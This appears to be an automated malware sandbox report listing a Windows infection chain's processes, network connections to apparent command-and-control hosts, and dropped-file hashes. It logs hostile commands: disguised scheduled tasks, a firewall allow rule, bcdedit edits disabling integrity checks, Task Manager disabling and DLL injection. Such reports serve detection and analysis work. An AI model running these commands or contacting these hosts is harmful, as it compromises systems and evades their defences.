PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe
PID 788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe

"C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\6E2E.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Users\Admin\AppData\Local\Temp\84BB.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\1cf4e57f-32c3-4019-88f0-dbc6891395db" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\84BB.exe

"C:\Users\Admin\AppData\Local\Temp\84BB.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\84BB.exe

"C:\Users\Admin\AppData\Local\Temp\84BB.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe"

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe"

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe"

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

"C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1456

C:\Users\Admin\AppData\Local\Temp\B8D6.exe

C:\Users\Admin\AppData\Local\Temp\B8D6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 124

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BD88.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\C851.exe

C:\Users\Admin\AppData\Local\Temp\C851.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240225224649.log C:\Windows\Logs\CBS\CbsPersist_20240225224649.cab

C:\Users\Admin\AppData\Local\Temp\C851.exe

"C:\Users\Admin\AppData\Local\Temp\C851.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\DE51.exe

C:\Users\Admin\AppData\Local\Temp\DE51.exe

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {7FE3199C-699E-4998-9CDF-A768539BA244} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\2F75.exe

C:\Users\Admin\AppData\Local\Temp\2F75.exe

C:\Users\Admin\AppData\Local\Temp\34C3.exe

C:\Users\Admin\AppData\Local\Temp\34C3.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\containerProviderhost\lSHV2TIIXWH4jLBRX.vbe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 564

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\containerProviderhost\SSJnjC24t.bat" "

C:\containerProviderhost\runtimenetSvc.exe

"C:\containerProviderhost/runtimenetSvc.exe"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CCTxfaFxh3.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\containerProviderhost\services.exe

"C:\containerProviderhost\services.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 564

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 brusuax.com udp
KR 211.119.84.112:80 brusuax.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 api.2ip.ua udp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 172.67.139.220:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 172.67.139.220:443 api.2ip.ua tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
KR 211.119.84.112:80 brusuax.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 habrafa.com udp
RU 193.106.174.70:80 trad-einmyus.com tcp
AR 190.224.203.37:80 habrafa.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
AR 190.224.203.37:80 habrafa.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
FI 65.109.172.49:443 65.109.172.49 tcp
FI 65.109.172.49:443 65.109.172.49 tcp
FI 65.109.172.49:443 65.109.172.49 tcp
FI 65.109.172.49:443 65.109.172.49 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 mahta-netwotk.click udp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 trypokemon.com udp
US 104.21.51.193:443 trypokemon.com tcp
US 8.8.8.8:53 loftproper.com udp
US 104.21.11.77:443 loftproper.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 5a371fb2-b800-4e2a-8b52-a44f9fc24242.uuid.createupdate.org udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
TR 185.50.70.125:443 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
NL 80.85.246.217:80 80.85.246.217 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 server8.createupdate.org udp
US 8.8.8.8:53 stun3.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.104:443 server8.createupdate.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
IT 142.251.27.127:19302 stun3.l.google.com udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
NL 80.85.246.217:80 80.85.246.217 tcp
NL 80.85.246.217:80 80.85.246.217 tcp
BG 185.82.216.104:443 server8.createupdate.org tcp

Files

memory/2932-1-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2932-2-0x00000000003B0000-0x00000000003BB000-memory.dmp

memory/2932-3-0x0000000000400000-0x0000000002BE0000-memory.dmp

memory/1256-4-0x0000000002510000-0x0000000002526000-memory.dmp

memory/2932-5-0x0000000000400000-0x0000000002BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E2E.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\84BB.exe

MD5 3d196de47911047d26c003e31a878038
SHA1 c368e8a2dacb6c322064f7f2aeb0b3cbcb274cd9
SHA256 19b9c4e7ba38960b14cf6557c7b6b7989009f0a7e368f1936050d1606c4cfc4a
SHA512 30871d6b7a9d94a602f21a6f5325f017c735db491351b64d9044b497c0f2d1cd8f0988857a358f29e077047ab5800a6384a2aa2ab17a539c2092d8828e87581b

memory/2648-26-0x0000000000330000-0x00000000003C1000-memory.dmp

memory/2648-27-0x0000000000330000-0x00000000003C1000-memory.dmp

memory/2940-31-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2648-30-0x00000000034E0000-0x00000000035FB000-memory.dmp

memory/2940-33-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2648-36-0x0000000000330000-0x00000000003C1000-memory.dmp

memory/2940-37-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2940-38-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2940-61-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2972-63-0x0000000001B20000-0x0000000001BB1000-memory.dmp

memory/2972-64-0x0000000001B20000-0x0000000001BB1000-memory.dmp

memory/1952-71-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-72-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 610f387cecd6b98e4abcb72626ee7d13
SHA1 791f01f69d1e025c15660cc87c6a2d332c16d1c7
SHA256 dd9c87c9d210b8dcb6f9d2b897c11b0a480b955a0aeaf4bb9b661f1bdc0604d1
SHA512 97d58a6504e70c4ceb4f255c6327d076b8ffc017945a9a8474f1ece483a5326d572ef13d6e4e5ba6bc2dba4b9575f99085ca2af2dbabc375f6bf0e8bef554858

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 03fa66209b4cb101cc0ca864da3d5487
SHA1 9b794bb5ad8c9b3110e47a8523fe9fe852de97a2
SHA256 bc77e3b84899b3f13f5fc75cc7f619a907504455937106d7e824920d6b0108d9
SHA512 1449a85046331be1ae0d416d3cb519f9ae69d3c050b22b1174664ccfb4c7e8cab2bfb7b0352099bc3de10abfd9f5f5b84f947dedaa86dd79a7e81674092469c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 ee838a25e9da12e2a5819cc7e940d21e
SHA1 2f6c9e7c286639e8a02f5c77089da35d03d2bc39
SHA256 1b3833124a22415acee38345934fe8c65f17ec48b4d254388b11d30915823555
SHA512 f8f4e6705c009a7e3940e6e91b16726c649d67fcf7a45e0d1b02d8263ca52a1b21ed11f646dc7d23a87a7a3791688817914e86e1a44745bf16ced580e11b2d16

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9ebb75a2ee551a4cd3b5b7b39c3a8314
SHA1 9396c3710604e25efec53cdb48e4bebdc2ddbe62
SHA256 360d2ca65d4ff9c142c2bc0d1f7814c9847405f150a8e5cb8a2814bb6fac732c
SHA512 59854413e16a2480828c6fab0012652eb177d66d29a93fab1df8496d455686cb52ee3e6f0c759e151417b656d9466623b5382d2a81e269475d437032d7b7dd1f

C:\Users\Admin\AppData\Local\Temp\Cab8C0A.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/1952-87-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-88-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-92-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-94-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-95-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-96-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe

MD5 c6d3d647baad8a5b93b81d2487f4f072
SHA1 e9c1105dc41f85d4f7e94d4e004f8427787c8802
SHA256 7754125653413cfca3bde887fb2a22f0cd5144ec447bb274c69b005861b70a0a
SHA512 55425dc95161e627e19e17f1bb910f958dade0c2b12da5eaad31159f0e2dc5217ff293c52f39d860d399807d5b4a814f1bb24376c58b40cc171d298282052049

memory/2244-112-0x0000000000470000-0x00000000004A6000-memory.dmp

memory/2244-111-0x0000000000280000-0x0000000000380000-memory.dmp

memory/2284-110-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2284-114-0x0000000000400000-0x0000000000649000-memory.dmp

memory/2284-117-0x0000000000400000-0x0000000000649000-memory.dmp

memory/2284-118-0x0000000000400000-0x0000000000649000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarA67D.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/1952-177-0x0000000000400000-0x0000000000537000-memory.dmp

memory/788-227-0x0000000000C50000-0x0000000000D50000-memory.dmp

memory/788-228-0x0000000000220000-0x0000000000224000-memory.dmp

memory/1508-239-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1508-242-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1508-244-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1508-245-0x0000000000410000-0x0000000000477000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 0904e849f8483792ef67991619ece915
SHA1 58d04535efa58effb3c5ed53a2462aa96d676b79
SHA256 fca631b3198194fcc0c619b5690dbde2e9f38afb1b978bab8ea3f92b572ce1ef
SHA512 258fc59050aa455ad56167dd1bbe5e098eefc0f3e950c90d89bac2aa74abb5cfa1710d866c0e28e58dcb2f914736470a4dd9838dd6412b633aee87d71b867cf5

memory/2544-275-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2544-277-0x0000000000ED0000-0x000000000177F000-memory.dmp

memory/2544-280-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2544-278-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2544-283-0x0000000077260000-0x0000000077261000-memory.dmp

memory/2544-284-0x0000000000190000-0x0000000000191000-memory.dmp

\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 91044e59972a50c139e40982ecd634a4
SHA1 36670182a5166f591780b98bedbef83bcac94950
SHA256 7285d2b17ba50b7cce109b7699f0cdcdd6adc900db2bc2279e751beb06bbb2b7
SHA512 93bc7fbf61afc7c42c1df62d59ed56e73eee4e06d518575633633211ede84be4f29afe240e417a2ca67a3fa5a26214d403d42257f1e612e24d40bea0803cfabc

\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 16d54f0d49c41790e1d265bc7452791a
SHA1 4f970896c8be729497106eac5c163321f1ba03f5
SHA256 20554829d97eb199a690636c1646ef1cbbc6ca93b078f5eae8a1c284b98d6a40
SHA512 ca121507f2833d31405201ef320fc5aa969d02e17fd754c7b6b088be102dcf38141e39a7f5f9ada76b6a9cc015cd6126145b9cdf7c6380d065e84a72085f32e9

\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 452d723c71b94983947183117a818966
SHA1 4b2fc7a2d747355eabb97da3988e7daccf942933
SHA256 b26f5d92a5a9761ca3f6935b55716e97ac3d59c31672b94660e52f74b2a043f6
SHA512 8c5f575e163eba6caecd6dc4062eca95756b46be6949910666ab0875f2f8fe4a4b8bf3d46213633d12bc8b44bac7a38598a5abd68c049dda713165bb46659558

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ad6566517eb3e9171d634756fbf3b078
SHA1 78705160e78e929c0e09232faa819175a1063c87
SHA256 a99f05d8aca8b5c545166628141a585021bc5275d4686eb2ac03a7445df5edb4
SHA512 3d42510ccc7a3b144da47849943f4a89f02ad28da6e733ecce52893dfe973329097ccc618b681c7c6e059b0a4bc4db0032d282e4e181f18b659f68c5b17c23c0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b2435d7a3ab468fc33970264424b92ab
SHA1 cd48c08aa31ae033e1ed796770296caa664f29c1
SHA256 d390ce7bfe6923bb7a45110c217ddffd4b8bd09606e72a1d6ed672d95c0cfa20
SHA512 5d90246fe4ca8d1fccd072a6a35e7dec288e9a8e71adac9e6f25f38aa360041fe0237e1572a82d0c6fd6924aeb38d5e88d372faf41f0d0b3420653792a0b973b

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 ae508ddc1d7aa4458eee2e5d0589d309
SHA1 40d76a78c2233779b2ae684c3d514ad01a3f6243
SHA256 5bd900c94124ecfacb040aa8a991715591808e22e71ff15b11935b02db6e4b9d
SHA512 36510d03a35975e612944c859fda03a4f10d6dd1292d654dacb7a0d3e1ad5e86407e9339aea03d855c666d21a0f67035323ecdda6aeaffce5d7d81c52fee1d56

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 c4cd2dabf6fe55752749ff664f9f9820
SHA1 b999a991aa6013a1cfe8d0bf5ee3e7ccd79012c9
SHA256 ecf58130e5f5905c6ab24345d42aa8ebf185bc45452fe9c93941d774d1d56c2e
SHA512 a2b64bbf37b291dbe3937100d228851024b44a953e91de6fedf1636dcaba7b4c02bcbd33fa21f0ce9fbdfde75a14893501ba583b0ddca0dce6968e67af5b6936

memory/2812-365-0x0000000003700000-0x0000000003AF8000-memory.dmp

memory/2284-366-0x0000000000400000-0x0000000000649000-memory.dmp

memory/2812-367-0x0000000003700000-0x0000000003AF8000-memory.dmp

memory/2812-368-0x0000000003B00000-0x00000000043EB000-memory.dmp

memory/2812-369-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 e2809f14a2f6abe51e7c3a9358b45320
SHA1 6c5e3bd8c078a1dc6cc36e8357ecd61ecb1ed879
SHA256 2496048773f210ec237d6559b673c29375537de6b1c7afc04157f4521b9945ae
SHA512 f5fbefba490e94d8bf3276a6fa964fd368a30c43fa9751c39d4ed14caa74eed17181c90f841442e3ec9800a36a80475557276cf20ae34a1b9f5e0d9e5614d9a9

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 3ab209ecb992b40aed1e8302dccc40e3
SHA1 68fe47da7d354cda05d4c013211a85a585501e11
SHA256 dccd5f02946183688b6e2158588eb3854b56cc5b60fc03af8eadb66e005d36b9
SHA512 1bee2fbd894ce760cd86a9c27c1ff035c84e9196ca417521b902688b86ae1b796738a0184183ab7b9f7f74189ca380f19965d1b9fa6fd153f4a6c19d1f5d230c

memory/1088-372-0x0000000003870000-0x0000000003C68000-memory.dmp

memory/2812-373-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/1088-374-0x0000000003870000-0x0000000003C68000-memory.dmp

memory/1088-375-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DE51.exe

MD5 41078ddcc4883c53b851fb092bcb79e1
SHA1 6370138391cc217a6b735ca2c1025d0382841a8e
SHA256 3d43f5bf00ff3e51dc4ccbc86bf0536859ea6db02b08097d6fe243405cb8d87a
